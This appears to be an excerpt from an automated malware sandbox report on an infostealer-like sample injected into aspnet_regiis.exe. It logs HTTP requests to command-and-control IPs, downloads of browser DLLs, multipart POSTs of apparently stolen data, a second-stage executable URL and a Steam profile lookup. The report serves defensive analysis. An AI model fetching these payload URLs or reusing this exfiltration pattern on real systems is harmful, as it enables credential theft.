                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 98177Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AntiVirusProductWindows Defender{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}windowsdefender://%ProgramFiles%\Windows Defender\MsMpeng.exeThu, 05 Oct 2023 07:18:28 GMTm/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: m/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe=----FBKFCFBFIDGCGDHJDBKFen
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                          Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                          Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
